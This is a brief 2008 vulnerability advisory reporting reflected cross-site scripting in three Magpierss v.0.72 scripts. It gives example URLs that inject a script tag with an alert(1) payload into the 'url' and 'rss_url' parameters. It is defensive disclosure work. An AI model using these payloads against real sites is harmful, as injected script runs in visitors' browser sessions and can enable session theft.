#36 Magpierss v.0.72 Cross-Site Scripting

[Sandor Attila Gerendi]

Magpierss v.0.72 Cross-Site Scripting

Author: Gerendi Sandor Attila
Date: April 21, 2008
Package: Magpierss
Product homepage: http://magpierss.sourceforge.net/
Versions Affected: v.0.72 (Other versions may also be affected)
Severity: XSS

Input passed to "url" parameter in "magpie_debug.php" and "magpie_simple.php" and "rss_url" parameter in "magpie_slashbox.php" is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which is executed in a user's browser session in context of an affected site when malicious data is viewed.

Example:
http://somehost/magpierss-0.72/scripts/magpie_debug.php?url=<script>alert\(1)</script>
http://somehost/magpierss-0.72/scripts/magpie_simple.php?url=<script>alert\(1)</script>
http://somehost/magpierss-0.72/scripts/magpie_slashbox.php?rss_url=<script>alert\(1)</script>

Status:
1. Contacted the author at April 21, 2008 via sourceforge tracker.